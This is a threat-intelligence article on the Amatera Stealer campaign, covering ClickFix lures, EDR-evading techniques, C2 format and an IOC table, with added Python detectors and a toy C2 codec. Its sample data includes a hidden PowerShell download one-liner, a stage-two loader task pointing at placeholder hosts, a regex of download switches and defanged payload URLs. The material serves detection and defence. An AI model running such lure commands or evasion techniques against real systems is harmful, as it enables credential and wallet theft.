Security analysts have identified a surge in attacks using Amatera Stealer, a rebranded information stealer sold as malware-as-a-service (MaaS) and descended from the ACR Stealer family.
The latest campaigns, detected by Proofpoint researchers, deliver Amatera Stealer through web injects, primarily via the ClearFake cluster, and the new builds show significant technical changes: added anti-analysis capabilities and an updated command and control (C2) protocol.
Amatera Stealer represents an evolution of the ACR Stealer with marked code overlap, but it has undergone enough development to be classified as a distinct threat.
The malware is actively sold on underground panels with subscription models ranging from $199 per month to $1,499 per year, highlighting the commoditization of sophisticated cybercrime tools.
With the disruption of leading alternatives like Lumma Stealer, security experts anticipate Amatera will gain further traction among cybercriminal operators.
Distribution primarily occurs via web injects, specifically ClearFake campaigns observed in April and May 2025.
In these attacks, legitimate but compromised websites serve malicious JavaScript that is fetched from smart contracts on a public blockchain, a method known as "EtherHiding".
Victims are shown a fake CAPTCHA overlay that instructs them to open the Windows Run dialog and paste a command (the ClickFix technique); the pasted command runs malicious PowerShell, which starts a multi-stage payload delivery.

Anti-Analysis Features
Amatera Stealer has adopted several techniques to evade both automated and manual analysis.
Most notably, it talks to its C2 over raw NT sockets: rather than calling Winsock, it opens the AFD device object \Device\Afd\Endpoint directly with native NT calls, so the connection never passes through the Windows networking APIs that endpoint detection and response (EDR) products typically hook.
The malware prefers to reach its C2 by IP address, often a Cloudflare CDN endpoint, with the intended hostname hardcoded in the HTTP Host header; this avoids DNS lookups (and DNS-based detection) and makes IP-based blocklisting impractical, since the addresses are shared CDN infrastructure.
Recent builds also resolve APIs dynamically and execute them through WoW64 syscalls.
According to Proofpoint's report, this lets the malware locate and invoke Windows APIs at runtime without passing through the user-mode API hooks that many sandboxes and EDR products depend on.
Additionally, Amatera Stealer disables PowerShell logging, uses Null-AMSI to defeat the Antimalware Scan Interface (AMSI), and relies on the Early Bird and Context Hijack injection techniques for payload delivery, further strengthening its anti-analysis posture.
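One way to turn the direct-IP observation above into a detection, as an added example that is not Proofpoint's or the malware's code: correlate each HTTP Host header (or TLS SNI) with the DNS queries the same client made shortly beforehand. A connection whose Host header names a domain the client never resolved, or whose destination IP was not among the DNS answers it received, is the footprint of a hardcoded Host header. The log records below are constructed Zeek-style JSON; the hostnames, addresses and the one-hour lookback window are assumptions.

```python
"""Flag HTTP(S) connections whose Host header was never resolved over DNS.

Added example; not Proofpoint's or the malware author's code. The records are
constructed, Zeek-style JSON (one object per line, fields as shown); the
hostnames and addresses are placeholders, not the IOCs from this article.
"""
import json
from collections import defaultdict

LOOKBACK_SECONDS = 3600  # assumption: a DNS answer older than an hour does not count

# Constructed dns.log-style records: client, name queried, answers returned.
DNS_LOG = [
    '{"ts": 1714550000.0, "id.orig_h": "10.0.0.5", "query": "www.example.com", "answers": ["93.184.216.34"]}',
    '{"ts": 1714550100.0, "id.orig_h": "10.0.0.5", "query": "cdn.legit-site.test", "answers": ["203.0.113.10"]}',
]

# Constructed http.log-style records (for TLS, use ssl.log and server_name instead of host).
HTTP_LOG = [
    '{"ts": 1714550001.0, "id.orig_h": "10.0.0.5", "id.resp_h": "93.184.216.34", "host": "www.example.com", "uri": "/"}',
    # Direct-to-IP connection carrying a hardcoded Host header: no DNS query preceded it.
    '{"ts": 1714550200.0, "id.orig_h": "10.0.0.5", "id.resp_h": "198.51.100.7", "host": "panel.unresolved.test", "uri": "/gate"}',
    # The name was resolved, but the client connected to an IP DNS never returned for it.
    '{"ts": 1714550250.0, "id.orig_h": "10.0.0.5", "id.resp_h": "198.51.100.8", "host": "cdn.legit-site.test", "uri": "/cfg"}',
]


def index_dns(dns_lines):
    """Map (client_ip, queried_name) -> list of (ts, {answer_ips})."""
    index = defaultdict(list)
    for line in dns_lines:
        rec = json.loads(line)
        name = rec["query"].lower().rstrip(".")
        index[(rec["id.orig_h"], name)].append((rec["ts"], set(rec.get("answers", []))))
    return index


def classify_http(rec, dns_index):
    """Return None if the Host header was resolved recently and the destination IP
    was among the answers; otherwise a short reason string."""
    host = rec.get("host", "").lower().rstrip(".")
    if not host:
        return "missing-host"
    if host.replace(".", "").isdigit():
        return None  # literal IP in the Host header: nothing to resolve
    recent = [
        answers
        for ts, answers in dns_index.get((rec["id.orig_h"], host), [])
        if 0 <= rec["ts"] - ts <= LOOKBACK_SECONDS
    ]
    if not recent:
        return "no-dns-for-host"
    if not any(rec["id.resp_h"] in answers for answers in recent):
        return "dest-ip-not-in-dns-answers"
    return None


def find_unresolved_hosts(dns_lines, http_lines):
    """Return one finding per HTTP record that fails the DNS correlation check."""
    dns_index = index_dns(dns_lines)
    findings = []
    for line in http_lines:
        rec = json.loads(line)
        reason = classify_http(rec, dns_index)
        if reason:
            findings.append({"ts": rec["ts"], "client": rec["id.orig_h"],
                             "dest": rec["id.resp_h"], "host": rec["host"], "reason": reason})
    return findings


if __name__ == "__main__":
    for finding in find_unresolved_hosts(DNS_LOG, HTTP_LOG):
        print(finding)
```

Run as-is, it reports the second and third HTTP records. In production, feed it Zeek dns.log and http.log (or ssl.log, using server_name in place of host) and expect false positives from clients that resolve names over DNS-over-HTTPS or from long-lived resolver caches; the lookback window is the knob to tune against those.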

Payload Handling and Exfiltration
On execution, Amatera Stealer contacts its C2 (now over either HTTP or HTTPS) to fetch a JSON configuration that dictates what it collects and what it runs next.
The malware primarily targets browser credentials, cookies, web form data, crypto wallets, password managers, and sensitive files associated with email clients and messaging applications.
By injecting shellcode into Chromium-based browsers it bypasses App-Bound Encryption, which otherwise prevents processes other than the browser from decrypting its cookies and saved credentials, and exfiltrates the protected data along with other sensitive files.
The C2 protocol carries Base64-encoded, XOR-encrypted JSON, which keeps command handling modular: the configuration can instruct the stealer to fetch and run secondary payloads, with .exe, .dll, .cmd and .ps1 files supported.
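A toy codec for the message format described above, added here as an illustration; it is not code from Proofpoint's report or from the malware. The page states only that C2 data is Base64-encoded, XOR-encrypted JSON, so the layer order (JSON, then XOR, then Base64), the keys and the sample task are assumptions. The two recovery helpers show what an analyst gets for free from such a format: a one-byte key is brute-forced by checking which candidate decodes to JSON, and because a JSON object begins with `{"`, the leading key bytes fall out of a known-plaintext XOR whatever the key length.

```python
"""Toy codec and key-recovery helpers for a Base64-over-XOR JSON C2 message.

Added example, not code from Proofpoint's report or from the malware. The page
only says the protocol is Base64-encoded, XOR-encrypted JSON; the layer order
(JSON -> XOR -> Base64), the keys and the sample task below are assumptions.
"""
import base64
import json


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR. Symmetric: the same call encrypts and decrypts."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def encode_message(obj, key: bytes) -> str:
    """Serialize obj as compact JSON, XOR it with key, then Base64-encode."""
    plaintext = json.dumps(obj, separators=(",", ":")).encode("utf-8")
    return base64.b64encode(xor_bytes(plaintext, key)).decode("ascii")


def decode_message(blob: str, key: bytes):
    """Reverse of encode_message; raises ValueError if the key is wrong."""
    return json.loads(xor_bytes(base64.b64decode(blob), key))


def recover_single_byte_key(blob: str):
    """Brute-force a one-byte key: only the right byte yields a JSON object/array.
    Returns (key_byte, decoded_object) or None."""
    ciphertext = base64.b64decode(blob)
    for k in range(256):
        candidate = xor_bytes(ciphertext, bytes([k]))
        try:
            obj = json.loads(candidate)  # raises on non-UTF-8 or non-JSON bytes
        except (ValueError, UnicodeDecodeError):
            continue
        if isinstance(obj, (dict, list)):
            return k, obj
    return None


def recover_key_prefix(blob: str, crib: bytes = b'{"') -> bytes:
    """Known-plaintext attack: a JSON object starts with '{"', so XORing the
    first ciphertext bytes with that crib yields the first len(crib) key bytes."""
    ciphertext = base64.b64decode(blob)
    return bytes(c ^ p for c, p in zip(ciphertext, crib))


# Constructed sample task shaped like the page's description (secondary payload
# types .exe/.dll/.cmd/.ps1). The URL and field names are placeholders.
SAMPLE_TASK = {
    "id": 17,
    "grab": ["browser_cookies", "wallets"],
    "loader": {"type": "ps1", "url": "https://c2.invalid/stage2.ps1"},
}

if __name__ == "__main__":
    key = b"\x5a\x13\x9c\x07"  # assumption: a 4-byte repeating key
    blob = encode_message(SAMPLE_TASK, key)
    print(blob)
    print(decode_message(blob, key))
    print(recover_key_prefix(blob).hex())  # prints 5a13, the first two key bytes
```

When triaging a real capture, try `recover_single_byte_key` first; if it fails, `recover_key_prefix` still tells you the key length is at least two and gives you the bytes to start a repeating-key search with.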
ClearFake continues to pioneer social-engineering and payload delivery methods. The ClickFix technique talks users into pasting a command into a Windows system dialog, so the initial stages run through legitimate tools such as PowerShell and msbuild.exe rather than through a file the browser downloaded.
Ongoing changes in obfuscation, encryption, and payload staging further complicate detection and remediation.
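Added detection logic for the ClickFix chain described in the distribution section and again here: a script host launched from the Run dialog with download or decode switches, then msbuild.exe compiling a downloaded project file. This is illustrative code, not Proofpoint's or any vendor's rule; the events are constructed to resemble Sysmon Event ID 1 fields, and the paths, URLs and process IDs are placeholders.

```python
"""Triage process-creation events for the ClickFix -> PowerShell -> msbuild.exe chain.

Added example; not detection content from Proofpoint or any vendor. Events are
constructed to resemble Sysmon Event ID 1 fields; paths, URLs and PIDs are placeholders.
"""
import re

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}

# Download, decode and window-hiding switches typical of pasted one-liners.
SUSPICIOUS_ARGS = re.compile(
    r"(-enc\w*\s|-e\s+[A-Za-z0-9+/=]{20,}|-w\s*hidden|-nop\b|\biex\b|invoke-expression|"
    r"downloadstring|invoke-webrequest|\biwr\b|frombase64string|https?://)",
    re.IGNORECASE,
)
PROJECT_FILE = re.compile(r"\.(csproj|vbproj|proj)\b", re.IGNORECASE)


def basename(path):
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify_event(ev):
    """Return the names of the rules the event matches (empty list if none)."""
    parent, image, cmd = basename(ev["ParentImage"]), basename(ev["Image"]), ev["CommandLine"]
    hits = []
    # Rule 1: the Run dialog is hosted by explorer.exe, so a paste-and-run lure
    # appears as explorer.exe spawning a script host with download/decode switches.
    if parent == "explorer.exe" and image in SCRIPT_HOSTS and SUSPICIOUS_ARGS.search(cmd):
        hits.append("clickfix_run_dialog")
    # Rule 2: msbuild.exe compiling a project file on behalf of a script host,
    # which is how an inline task inside a downloaded .csproj gets executed.
    if image == "msbuild.exe" and parent in SCRIPT_HOSTS and PROJECT_FILE.search(cmd):
        hits.append("msbuild_project_loader")
    return hits


def triage(events):
    """Return (ProcessId, [rules]) for every event that matched at least one rule."""
    results = []
    for ev in events:
        hits = classify_event(ev)
        if hits:
            results.append((ev["ProcessId"], hits))
    return results


# Constructed events: 1001/1002 mimic the lure chain; 1003/1004 are benign look-alikes.
SAMPLE_EVENTS = [
    {"ProcessId": "1001", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -nop -c "iwr https://lure.invalid/t.csproj -OutFile $env:TEMP\\t.csproj"'},
    {"ProcessId": "1002", "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "CommandLine": r"MSBuild.exe C:\Users\u\AppData\Local\Temp\t.csproj"},
    {"ProcessId": "1003", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe"},
    {"ProcessId": "1004", "ParentImage": r"C:\Program Files\Microsoft Visual Studio\devenv.exe",
     "Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "CommandLine": r"MSBuild.exe C:\src\app\app.csproj /t:Build"},
]

if __name__ == "__main__":
    for pid, rules in triage(SAMPLE_EVENTS):
        print(pid, rules)
```

Rule 1 keys on explorer.exe because that process hosts the Run dialog; the same lure pasted into a terminal would need a variant keyed on the terminal host. On the endpoint, commands entered in the Run dialog are also recorded under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, which is worth collecting during triage of a suspected ClickFix victim.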
Given the ongoing development and deployment of Amatera Stealer, organizations should raise user awareness of paste-and-run lures such as ClickFix, include them in security training against social engineering, and enforce controls that block unauthorized PowerShell and script execution, for example through application control policies.
Because the stealer's anti-analysis techniques defeat many signature-based controls, monitoring for behavioral indicators (process lineage, script-host command lines, and connections to hosts the client never resolved over DNS) is recommended over signature-based detection alone.
Indicators of Compromise (IOCs)
| Type | Value/Identifier | Notes |
|---|---|---|
| SHA256 | 120316ecaf06b76a564ce42e11f7074c52df6d79b85d3526c5b4e9f362d2f1c2 | Amatera Stealer: NTSockets, no HTTPS, no second stage malware |
| SHA256 | 7d91a585583f4aa1a3ab3cb808d7bc351d6140b3ae1deeef9d51c6414c11baea | Amatera Stealer: NTSockets usage, HTTPS support |
| SHA256 | 35eb93548a0c037d392f870c05e0e9fb1aeff3a5a505e1d4a087f7465ed1f6af | Amatera Stealer: NTSockets usage, HTTPS C2 |
| SHA256 | 2960d5f8a3d9b0a21d6b744092fe3089517ecf2e49169683f754bfe9800e3991 | ClearFake ClickFix csproj payload |
| SHA256 | ad9ffd624e27070092ff18a10e33fa9e2784b2c75ac9ac4540fa81cf5bd84e55 | ClearFake second stage PowerShell |
| SHA256 | 055a883f18ffcc413973fa45383e72e998aae87909af5f9507b6384bfec34a5b | ClearFake shellcode leading to Amatera |
| IP | 104.21.80[.]1 | Amatera C2: overplanteasiest[.]top |
| IP | 172.67.178[.]5 | Amatera C2: badnesspandemic[.]shop |
| Domain | amaprox[.]icu | Amatera infrastructure (HTTPS security context) |
| Domain | b1[.]talismanoverblown[.]com | Amatera infrastructure (C2, HTTPS) |
| URL | https://cv[.]cbrw[.]ru/t.csproj | ClearFake ClickFix payload |
| URL | https://tt[.]cbrw[.]ru/vb7to8.psd | ClearFake second stage PowerShell |
| URL | https://cv[.]cbrw[.]ru/init1.bin | ClearFake shellcode leading to Amatera |
| Other | 0x80d31D935f0EC978253A26D48B5593599B9542C7 | ClearFake smart contract (BNB Smart Chain Testnet) |